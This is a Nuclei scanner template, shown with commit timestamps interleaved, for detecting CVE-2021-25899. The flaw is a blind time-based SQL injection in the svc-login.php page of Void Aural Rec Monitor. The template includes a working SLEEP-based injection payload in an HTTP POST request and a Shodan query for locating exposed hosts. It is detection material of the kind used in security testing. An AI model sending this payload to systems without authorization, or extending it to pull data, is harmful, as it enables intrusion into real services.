nuclei-templates/http/cves/2021/CVE-2021-25899.yaml

47 lines
1.8 KiB
YAML
Raw Normal View History

2022-10-01 08:15:59 +00:00
id: CVE-2021-25899
info:
name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
author: edoardottt
severity: high
2022-10-01 08:15:59 +00:00
description: |
Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.
2022-10-01 08:15:59 +00:00
reference:
2023-02-02 07:14:09 +00:00
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
2022-10-01 08:15:59 +00:00
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
- https://nvd.nist.gov/vuln/detail/CVE-2021-25899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-10-01 08:15:59 +00:00
cve-id: CVE-2021-25899
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.54555
epss-percentile: 0.97184
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*
2023-02-02 07:14:09 +00:00
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: void
product: aurall_rec_monitor
2023-09-06 12:09:01 +00:00
shodan-query: html:"AURALL"
2023-02-02 07:14:09 +00:00
tags: cve,cve2021,sqli,void,aurall
2022-10-01 08:15:59 +00:00
http:
2022-10-01 08:15:59 +00:00
- raw:
- |
POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy&param2=test
matchers:
- type: dsl
dsl:
- 'duration>=5'
2023-02-02 07:14:09 +00:00
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Contacte con el administrador")'
condition: and